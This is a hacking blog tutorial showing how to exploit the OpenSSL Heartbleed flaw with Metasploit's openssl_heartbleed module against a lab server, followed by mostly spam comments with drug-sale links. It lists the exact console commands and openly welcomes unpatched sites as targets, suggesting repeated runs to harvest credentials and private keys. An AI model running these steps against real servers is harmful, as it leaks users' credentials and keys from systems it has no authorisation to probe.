Crypto WorldHackingLINUX BASICSNETWORK FEDILITIESVirus Chest

Hacking the Heartbleed Vulnerability

25

In recent weeks, the Heartbleed vulnerability of OpenSSL has been dominating the information security headlines. This vulnerability enables an attacker to extract data from the server’s memory that may contain authentication credentials, cookies, the servers private key, and personally identifiable info (PII) that could be used for identity theft. As a result, websites around the world have been scrambling to close this hole. Fortunately for us, many still have not, and many may never be closed.

Basically, OpenSSL is an encryption library used in HTTPS (secure HTTP). The idea is that any data traveling over this secured version of HTTP should be secure and encrypted. During communication, OpenSSL uses a “heartbeat” that echoes back data to verify that the data was received correctly. It’s kind of like one machine telling the other, “Yes, I got that data and you can send more now.”

The Heartbleed vulnerability enables a hacker to trick OpenSSL by sending a singlebyte of data while telling the server it sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back. The server will then respond with 64K of random data from its memory.

In this tutorial, I’ll show you a simple exploit for getting that OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information.

Step 1 – Update Metasploit

The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:

  • kali > msfupdate

Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here, it takes awhile.

When you are finally returned to the Kali prompt, the update has completed.

Step 2 – Start Metasploit

Now, we need to start the Metasploit console. At any terminal prompt, type:

  • kali > msfconsole

You should be greeted with a screen like that below.

Step 3 – Find Heartbleed

Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:

  • search heartbleed

This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.

Step 4 – Use Auxiliary Module

Next, we need to load this payload. Simply type:

  • use auxiliary/scanner/ssl/openssl_heartbleed

This will load the heartbleed module.

Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:

  • msf > info

As we can see in the screenshot below, this reveals the options that need to set in order to use this module and a description of the module.

Step 5 – Set Options

Although this module has numerous options, the critical one is RHOSTS (notice the plural here). Let’s set it to a target website I set up on my network that is still vulnerable to Heartbleed.

  • msf > set RHOSTS 192.168.1.169

Step 6 – Run the Module

Finally, set the option ‘verbose” to “true”. This will provide us with verbose output.

  • msf > set verbose true

And now let’s run it:

  • msf > run

As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.

Step 7 – Success

If credentials, personally identifiable information (PII), or the server’s private key had been in memory, they would have leaked out as well. Of course, we could set up this Heartbleed scanner to run repeatedly to gather the info in memory at a continual basis, eventually gaining access to all the info that traversed RAM.

In my next Heartbleed post, we will start working on a scanner script to scan the world for websites and servers still vulnerable to the Heartbleed vulnerability, so make sure to come back. While you’re waiting, you can use your spare time to increase your skills in Metasploit by knowing all of the commands and hacking scripts available.

Lovepreet Singh
CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)

SQL Injection Attacks: Know How to Prevent Them

Previous article

A Simple Virus Written…in Bash!

Next article

You may also like

25 Comments

  1. Cats And Amoxicillin Safest Place To Buy Ed Medicens [url=http://uscagsa.com]cialis for sale[/url] Pariet Levitra Cialis Espana Cialis Tadalafil Tabletas

  2. How long does a copyright last on newspaper articles?. . If a service copies newspapers articles and then posts it in a database on the Internet, is there also a copyright on the Internet content?.

  3. I just want to mention I’m all new to blogs and certainly savored you’re web site. More than likely I’m want to bookmark your site . You surely have good writings. Appreciate it for sharing your web page.

  4. I just want to mention I’m all new to blogs and certainly savored you’re web site. More than likely I’m want to bookmark your site . You surely have good writings. Appreciate it for sharing your web page.

  5. Cheapeast Progesterone Store Zithromax Sexually Transmitted Infections Kamagra Long Term Side Effects [url=http://durazy.com]buy viagra[/url] Cephalexin Dose For Dog

  6. hi!,I love your writing so a lot! share we communicate
    extra about your article on AOL? I require an expert in this area to unravel my problem.
    Maybe that’s you! Taking a look ahead to look you.

  7. It’s not my first time to go to see this website, i am visiting this web page
    dailly and obtain fastidious information from here everyday.

  8. I always used to study paragraph in news papers but now as
    I am a user of net so from now I am using net for
    articles or reviews, thanks to web.

  9. Today, I went to the beach with my kids. I found
    a sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She placed the
    shell to her ear and screamed. There was a hermit crab inside
    and it pinched her ear. She never wants to go back!
    LoL I know this is entirely off topic but I had to tell someone!

  10. If you want to increase your experience simply keep visiting
    this site and be updated with the hottest gossip posted here.

  11. you are really a excellent webmaster. The site loading pace is
    incredible. It sort of feels that you are doing any distinctive trick.
    Moreover, The contents are masterpiece. you have done a fantastic process in this topic!

  12. Acquisto Viagra On Line Rischi Triexer Sildenafil Pas Cher 120 Mg [url=http://exdrugs.com]viagra[/url] Betaxolol Hpb Approved Generic Viagra In Canada Viagra Commander France

  13. It’s in point of fact a nice and helpful piece of info.
    I am satisfied that you just shared this helpful
    information with us. Please keep us informed like this.
    Thank you for sharing.

  14. This is a topic that is close to my heart…
    Best wishes! Exactly where are your contact details though?

  15. We are a group of volunteers and starting a new scheme in our
    community. Your website offered us with valuable information to work on. You’ve
    done a formidable job and our whole community will be thankful
    to you.

  16. What’s up, this weekend is fastidious for me, for the reason that
    this time i am reading this wonderful informative paragraph here at my house.

  17. Heya just wanted to give you a quick heads up and let
    you know a few of the images aren’t loading properly.
    I’m not sure why but I think its a linking issue.
    I’ve tried it in two different browsers and
    both show the same outcome.

  18. excellent issues altogether, you just received a new reader.
    What would you recommend in regards to your put up that
    you simply made some days ago? Any certain?

  19. There is definately a great deal to learn about this subject.

    I like all of the points you made.

  20. We absolutely love your blog and find almost all of
    your post’s to be precisely what I’m looking for.
    Would you offer guest writers to write content for you personally?
    I wouldn’t mind creating a post or elaborating on some of the subjects
    you write related to here. Again, awesome web site!

  21. This site was… how do I say it? Relevant!! Finally
    I’ve found something that helped me. Thanks!

  22. What’s up, I desire to subscribe for this webpage to obtain most recent updates, so where can i do it please help out.

  23. It’s really a nice and helpful piece of info. I’m happy that you shared this helpful
    info with us. Please keep us up to date like this.
    Thanks for sharing.

  24. Magnificent website. Plenty of useful info here. I
    am sending it to several pals ans additionally sharing in delicious.
    And certainly, thank you on your sweat!

  25. Do you have any video of that? I’d care to find out more details.

Leave a reply

Your email address will not be published. Required fields are marked *

More in Crypto World